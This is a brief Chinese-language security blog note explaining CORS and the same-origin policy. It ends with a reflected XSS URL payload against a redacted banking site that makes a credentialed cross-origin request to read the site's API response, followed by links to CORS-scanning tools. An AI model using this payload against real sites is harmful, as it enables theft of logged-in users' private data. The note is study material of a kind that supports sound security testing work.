Zumpyx's Blog

CORS 笔记

webcors

跨源资源共享 (CORS) 是一种浏览器机制,支持对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 (SOP) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也提供了跨域攻击的可能性。CORS 不是针对跨源攻击(如跨站点请求伪造 (CSRF))的保护措施。

同源策略(Same-origin policy):

  • 相同协议、相同域名、相同端口 同源策略是一种限制性的跨源规范,用于限制网站与源域外部资源交互的能力。同源策略是多年前定义的,以响应潜在的恶意跨域交互,例如一个网站从另一个网站窃取私人数据。它通常允许域向其他域发出请求,但不允许访问响应。

放宽同源策略(Relaxation of the same-origin policy)

同源政策的限制性很强,因此设计了各种方法来规避这些限制。许多网站与子域或第三方网站交互的方式需要完全跨域访问。使用跨源资源共享 (CORS) 可以控制同源策略的放宽。

跨源资源共享协议使用一套 HTTP 标头,用于定义受信任的 Web 源和相关属性,例如是否允许经过身份验证的访问。它们组合在浏览器和它尝试访问的跨源网站之间的标头交换中。

https://banques.redacted.com/choice-quiz?form_banque=">
<script>
function%20cors(){
	var%20xhttp=new%20XMLHttpRequest();
	xhttp.onreadystatechange=function(){
		if(this.status==200)  
	alert(this.responseText);
	document.getElementById("demo").innerHTML=this.responseText
	}};
xhttp.open("GET","https://www.redacted.com/api/return",true);
xhttp.withCredentials=true;
xhttp.send()
}

cors();

</script>&form_cartes=73&iframestat=1
https://github.com/chenjj/CORScanner
https://github.com/lc/theftfuzzer
https://github.com/s0md3v/Corsy
https://github.com/Shivangx01b/CorsMe